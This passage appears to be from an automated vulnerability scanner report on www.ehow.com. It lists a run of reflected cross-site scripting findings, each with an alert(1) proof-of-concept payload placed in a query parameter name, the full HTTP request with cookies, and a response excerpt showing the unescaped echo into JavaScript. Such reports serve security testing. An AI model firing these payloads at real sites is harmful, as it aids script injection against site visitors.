This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fitness/?1122d'-alert(1)-'dc35503d8e3=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:59 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71761

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Fitness - How To Information | eHow.com</title>

...[SNIP]...
<fb:like href="http://www.ehow.com/fitness/?1122d'-alert(1)-'dc35503d8e3=1" ref="like" width="300">
...[SNIP]...

4.362. http://www.ehow.com/food-and-drink/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/food-and-drink/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc0e'-alert(1)-'5a32fd4a744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /food-and-drink/?7dc0e'-alert(1)-'5a32fd4a744=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:58 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73340

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Food & Drink - How To Information | eHow.com</tit
...[SNIP]...
<fb:like href="http://www.ehow.com/food-and-drink/?7dc0e'-alert(1)-'5a32fd4a744=1" ref="like" width="300">
...[SNIP]...

4.363. http://www.ehow.com/healthcare/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/healthcare/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9aaa'-alert(1)-'75a70bf2071 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /healthcare/?f9aaa'-alert(1)-'75a70bf2071=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71152

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Healthcare - How To Information | eHow.com</title
...[SNIP]...
<fb:like href="http://www.ehow.com/healthcare/?f9aaa'-alert(1)-'75a70bf2071=1" ref="like" width="300">
...[SNIP]...

4.364. http://www.ehow.com/healthy-living/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/healthy-living/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f38f'-alert(1)-'8c7b03448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /healthy-living/?9f38f'-alert(1)-'8c7b03448=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68271

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Healthy Living - How To Information | eHow.com</t
...[SNIP]...
<fb:like href="http://www.ehow.com/healthy-living/?9f38f'-alert(1)-'8c7b03448=1" ref="like" width="300">
...[SNIP]...

4.365. http://www.ehow.com/hobbies-and-science/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/hobbies-and-science/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e398d'-alert(1)-'06fc955b57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hobbies-and-science/?e398d'-alert(1)-'06fc955b57a=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:17 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72225

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Hobbies & Science - How To Information | eHow.com
...[SNIP]...
<fb:like href="http://www.ehow.com/hobbies-and-science/?e398d'-alert(1)-'06fc955b57a=1" ref="like" width="300">
...[SNIP]...

4.366. http://www.ehow.com/holidays-and-celebrations/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/holidays-and-celebrations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 506ce'-alert(1)-'b3c6ff17c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /holidays-and-celebrations/?506ce'-alert(1)-'b3c6ff17c61=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.367. http://www.ehow.com/home-building-and-remodeling/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-building-and-remodeling/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed847'-alert(1)-'467cb45ab89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /home-building-and-remodeling/?ed847'-alert(1)-'467cb45ab89=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.368. http://www.ehow.com/home-design-and-decorating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-design-and-decorating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30749'-alert(1)-'96a91f5fd07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /home-design-and-decorating/?30749'-alert(1)-'96a91f5fd07=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.369. http://www.ehow.com/home-maintenance-and-repair/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-maintenance-and-repair/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9888d'-alert(1)-'5944bfd28d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /home-maintenance-and-repair/?9888d'-alert(1)-'5944bfd28d9=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73411

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Home Maintenance & Repair - How To Information |
...[SNIP]...
<fb:like href="http://www.ehow.com/home-maintenance-and-repair/?9888d'-alert(1)-'5944bfd28d9=1" ref="like" width="300">
...[SNIP]...

4.370. http://www.ehow.com/home-safety-and-household-tips/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/home-safety-and-household-tips/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef6bc'-alert(1)-'0b251195974 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /home-safety-and-household-tips/?ef6bc'-alert(1)-'0b251195974=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.371. http://www.ehow.com/housekeeping/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/housekeeping/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78bd5'-alert(1)-'57433244f77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /housekeeping/?78bd5'-alert(1)-'57433244f77=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71760

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Housekeeping - How To Information | eHow.com</tit
...[SNIP]...
<fb:like href="http://www.ehow.com/housekeeping/?78bd5'-alert(1)-'57433244f77=1" ref="like" width="300">
...[SNIP]...

4.372. http://www.ehow.com/how_13299_know-someone-lying.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_13299_know-someone-lying.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcda3'-alert(1)-'e5bc67b4dc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_13299_know-someone-lying.html?dcda3'-alert(1)-'e5bc67b4dc4=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.373. http://www.ehow.com/how_2053743_make-crock-pot-pork-roast.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2053743_make-crock-pot-pork-roast.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e87e0'-alert(1)-'d9cba84b7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_2053743_make-crock-pot-pork-roast.html?e87e0'-alert(1)-'d9cba84b7c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:49 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75941

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Make a Crock Pot Pork Roast | eHow.com</ti
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_2053743_make-crock-pot-pork-roast.html?e87e0'-alert(1)-'d9cba84b7c=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_2053743_make-crock-pot-po
...[SNIP]...

4.374. http://www.ehow.com/how_2077554_repair-cracks-dashboard.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2077554_repair-cracks-dashboard.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dcbd'-alert(1)-'5482c536ab0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_2077554_repair-cracks-dashboard.html?6dcbd'-alert(1)-'5482c536ab0=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:06 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75255

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Repair Cracks in a Dashboard | eHow.com</t
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_2077554_repair-cracks-dashboard.html?6dcbd'-alert(1)-'5482c536ab0=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_2077554_repair-cracks-das
...[SNIP]...

4.375. http://www.ehow.com/how_2113353_end-sibling-feuds.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2113353_end-sibling-feuds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cb73'-alert(1)-'4756d1fe387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_2113353_end-sibling-feuds.html?3cb73'-alert(1)-'4756d1fe387=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87744

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to End Sibling Feuds | eHow.com</title>
<m
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_2113353_end-sibling-feuds.html?3cb73'-alert(1)-'4756d1fe387=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_2113353_end-sibling-feuds
...[SNIP]...

4.376. http://www.ehow.com/how_2304056_cut-shirt-make-cuter.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_2304056_cut-shirt-make-cuter.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b04'-alert(1)-'39477125765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_2304056_cut-shirt-make-cuter.html?a4b04'-alert(1)-'39477125765=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76783

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Cut a T Shirt To Make It Cuter | eHow.com<
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_2304056_cut-shirt-make-cuter.html?a4b04'-alert(1)-'39477125765=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_2304056_cut-shirt-make-cu
...[SNIP]...

4.377. http://www.ehow.com/how_3815_minutes-business-meeting.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_3815_minutes-business-meeting.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2374'-alert(1)-'6994478717a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_3815_minutes-business-meeting.html?a2374'-alert(1)-'6994478717a=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:50 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91357

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Take Minutes at a Business Meeting | eHow.
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_3815_minutes-business-meeting.html?a2374'-alert(1)-'6994478717a=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_3815_minutes-business-mee
...[SNIP]...

4.378. http://www.ehow.com/how_4469163_edit-pdf-document.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_4469163_edit-pdf-document.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0dca'-alert(1)-'85cb027615b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /how_4469163_edit-pdf-document.html?b0dca'-alert(1)-'85cb027615b=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:06 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78940

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>How to Edit a PDF Document | eHow.com</title>

...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/how_4469163_edit-pdf-document.html?b0dca'-alert(1)-'85cb027615b=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/how_4469163_edit-pdf-document
...[SNIP]...

4.379. http://www.ehow.com/how_4474239_make-graph-using-excel.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/how_4474239_make-graph-using-excel.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f436'-alert(1)-'4415fbcb8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

